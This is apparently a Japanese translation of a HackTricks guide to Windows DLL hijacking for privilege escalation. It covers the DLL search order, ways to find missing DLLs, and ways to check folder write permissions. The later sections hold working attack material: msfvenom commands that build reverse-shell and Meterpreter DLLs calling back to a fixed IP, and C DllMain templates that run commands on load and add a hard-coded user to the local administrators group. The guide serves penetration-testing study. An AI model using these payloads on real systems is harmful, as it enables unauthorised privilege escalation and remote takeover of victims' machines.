Dll Hijacking

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

Basic Information

DLL Hijackingは、信頼されたアプリケーションを操作して悪意のあるDLLを読み込ませることを含みます。この用語は、DLL Spoofing、Injection、Side-Loadingなどのいくつかの戦術を含みます。主にコード実行、持続性の達成、そしてあまり一般的ではない特権昇格に利用されます。ここでは昇格に焦点を当てていますが、ハイジャックの方法は目的に関係なく一貫しています。

Common Techniques

DLLハイジャックにはいくつかの方法があり、各アプリケーションのDLL読み込み戦略に応じて効果が異なります：

1. DLL Replacement: 正規のDLLを悪意のあるDLLと入れ替え、オプションでDLLプロキシを使用して元のDLLの機能を保持します。

2. DLL Search Order Hijacking: 悪意のあるDLLを正当なDLLの前に検索パスに配置し、アプリケーションの検索パターンを悪用します。

3. Phantom DLL Hijacking: アプリケーションが存在しない必要なDLLだと思い込んで読み込む悪意のあるDLLを作成します。

4. DLL Redirection: %PATH%や.exe.manifest / .exe.localファイルの検索パラメータを変更して、アプリケーションを悪意のあるDLLに誘導します。

5. WinSxS DLL Replacement: WinSxSディレクトリ内で正当なDLLを悪意のあるDLLと置き換えます。この方法はDLLサイドローディングに関連しています。

6. Relative Path DLL Hijacking: コピーしたアプリケーションと共にユーザーが制御するディレクトリに悪意のあるDLLを配置し、バイナリプロキシ実行技術に似ています。

Finding missing Dlls

システム内で欠落しているDLLを見つける最も一般的な方法は、sysinternalsからprocmonを実行し、次の2つのフィルターを設定します：

そして、ファイルシステムアクティビティのみを表示します：

一般的に欠落しているdllを探している場合は、これを数秒間実行します。 特定の実行可能ファイル内の欠落しているdllを探している場合は、**"Process Name" "contains" "<exec name>"**のような別のフィルターを設定し、それを実行してイベントのキャプチャを停止する必要があります。

Exploiting Missing Dlls

特権を昇格させるための最良のチャンスは、特権プロセスが読み込もうとするdllを書くことができることです。したがって、元のdllがあるフォルダーの前にdllが検索されるフォルダーにdllを書くことができるか、dllが検索されるフォルダーに書き込むことができ、元のdllがどのフォルダーにも存在しない場合です。

Dll Search Order

Microsoftのドキュメント**の中で、DLLがどのように読み込まれるかを具体的に見つけることができます。

Windowsアプリケーションは、特定の順序に従って事前定義された検索パスに従ってDLLを探します。DLLハイジャックの問題は、有害なDLLがこれらのディレクトリの1つに戦略的に配置され、正当なDLLの前に読み込まれることを保証する場合に発生します。この問題を防ぐための解決策は、アプリケーションが必要なDLLを参照する際に絶対パスを使用することです。

32ビットシステムのDLL検索順序は以下の通りです：

1. アプリケーションが読み込まれたディレクトリ。

2. システムディレクトリ。 GetSystemDirectory関数を使用してこのディレクトリのパスを取得します。(C:\Windows\System32)

3. 16ビットシステムディレクトリ。このディレクトリのパスを取得する関数はありませんが、検索されます。 (C:\Windows\System)

4. Windowsディレクトリ。 GetWindowsDirectory関数を使用してこのディレクトリのパスを取得します。(C:\Windows)

5. 現在のディレクトリ。

6. PATH環境変数にリストされているディレクトリ。これは、App Pathsレジストリキーによって指定されたアプリケーションごとのパスを含まないことに注意してください。 App Pathsキーは、DLL検索パスを計算する際には使用されません。

これは、SafeDllSearchModeが有効な場合のデフォルトの検索順序です。無効にすると、現在のディレクトリが2番目の位置に昇格します。この機能を無効にするには、HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchModeレジストリ値を作成し、0に設定します（デフォルトは有効です）。

LoadLibraryEx関数がLOAD_WITH_ALTERED_SEARCH_PATHで呼び出されると、検索はLoadLibraryExが読み込んでいる実行可能モジュールのディレクトリから始まります。

最後に、dllは名前だけでなく絶対パスを指定して読み込まれる可能性があることに注意してください。その場合、そのdllはそのパス内でのみ検索されます（dllに依存関係がある場合、それらは名前で読み込まれたものとして検索されます）。

検索順序を変更する他の方法もありますが、ここでは説明しません。

Exceptions on dll search order from Windows docs

Windowsのドキュメントには、標準のDLL検索順序に関する特定の例外が記載されています：

• メモリに既に読み込まれているDLLと同じ名前のDLLが遭遇した場合、システムは通常の検索をバイパスします。代わりに、リダイレクションとマニフェストのチェックを行い、メモリ内のDLLにデフォルトします。このシナリオでは、システムはDLLの検索を行いません。

• DLLが現在のWindowsバージョンの既知のDLLとして認識される場合、システムはその既知のDLLのバージョンとその依存DLLを使用し、検索プロセスを省略します。レジストリキーHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLsには、これらの既知のDLLのリストが保持されています。

• DLLに依存関係がある場合、これらの依存DLLの検索は、最初のDLLがフルパスで識別されたかどうかに関係なく、モジュール名のみで示されたかのように行われます。

Escalating Privileges

Requirements:

• 異なる特権（水平または側方移動）で動作するか、動作するプロセスを特定し、DLLが欠落していることを確認します。

• DLLが検索される任意のディレクトリに書き込みアクセスがあることを確認します。この場所は、実行可能ファイルのディレクトリまたはシステムパス内のディレクトリである可能性があります。

はい、要件は複雑で、デフォルトでは特権のある実行可能ファイルがDLLを欠落させているのを見つけるのは奇妙ですし、システムパスフォルダーに書き込み権限を持つのはさらに奇妙です（デフォルトではできません）。しかし、誤って構成された環境ではこれは可能です。 運が良ければ要件を満たしている場合は、UACMEプロジェクトを確認できます。プロジェクトの主な目的はUACをバイパスすることですが、使用できるWindowsバージョンのDLLハイジャックのPoC**が見つかるかもしれません（おそらく書き込み権限のあるフォルダーのパスを変更するだけです）。

フォルダー内の権限を確認するには、次のようにします：

accesschk.exe -dqv "C:\Python27"
icacls "C:\Python27"

そしてPATH内のすべてのフォルダーの権限を確認します:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

あなたは次のコマンドを使用して、実行可能ファイルのインポートとdllのエクスポートを確認することもできます:

dumpbin /imports C:\path\Tools\putty\Putty.exe
dumpbin /export /path/file.dll

For a full guide on how to abuse Dll Hijacking to escalate privileges with permissions to write in a System Path folder check:

Automated tools

Winpeas は、システムPATH内の任意のフォルダーに書き込み権限があるかどうかを確認します。 この脆弱性を発見するための他の興味深い自動化ツールは、PowerSploit関数：Find-ProcessDLLHijack、Find-PathDLLHijack、および _Write-HijackDll_です。

Example

利用可能なシナリオを見つけた場合、成功裏にそれを悪用するための最も重要なことの1つは、実行可能ファイルがインポートするすべての関数を少なくともエクスポートするdllを作成することです。とにかく、Dll Hijackingは、中程度の整合性レベルから高い整合性レベルに昇格するために便利です（UACをバイパス）または高い整合性からSYSTEMに昇格するために。 有効なdllを作成する方法の例は、実行のためのdllハイジャックに焦点を当てたこのdllハイジャック研究の中にあります：https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows。 さらに、次のセクションでは、テンプレートとして役立つか、エクスポートされた非必須関数を持つdllを作成するためのいくつかの基本的なdllコードを見つけることができます。

Creating and compiling Dlls

Dll Proxifying

基本的に、Dllプロキシは、読み込まれたときに悪意のあるコードを実行することができるDllですが、実際のライブラリへのすべての呼び出しを中継することによって、期待通りに 露出し、機能することもできます。

ツールDLLirantまたはSpartacusを使用すると、実行可能ファイルを指定し、プロキシ化したいライブラリを選択してプロキシ化されたdllを生成したり、Dllを指定してプロキシ化されたdllを生成したりできます。

Meterpreter

Get rev shell (x64):

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll

メーターpreterを取得する (x86):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll

ユーザーを作成する (x86のバージョンしか見当たりませんでした):

msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll

あなた自身の

いくつかのケースでは、コンパイルしたDllは、被害者プロセスによってロードされるいくつかの関数をエクスポートする必要があります。これらの関数が存在しない場合、バイナリはそれらをロードできず、エクスプロイトは失敗します。

// Tested in Win10
// i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
switch(dwReason){
case DLL_PROCESS_ATTACH:
system("whoami > C:\\users\\username\\whoami.txt");
WinExec("calc.exe", 0); //This doesn't accept redirections like system
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}

// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
if (dwReason == DLL_PROCESS_ATTACH){
system("cmd.exe /k net localgroup administrators user /add");
ExitProcess(0);
}
return TRUE;
}

//x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
//x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a

#include <windows.h>

int owned()
{
WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
owned();
return 0;
}

//Another possible DLL
// i686-w64-mingw32-gcc windows_dll.c -shared -lws2_32 -o output.dll

#include<windows.h>
#include<stdlib.h>
#include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded
system("cmd");
}

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call){
case DLL_PROCESS_ATTACH:
CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DEATCH:
break;
}
return TRUE;
}

参考文献

• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e

• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html

バグバウンティのヒント: ハッカーによる、ハッカーのためのプレミアム バグバウンティプラットフォーム Intigritiにサインアップしましょう！今日、https://go.intigriti.com/hacktricksに参加して、最大**$100,000**のバウンティを獲得し始めましょう！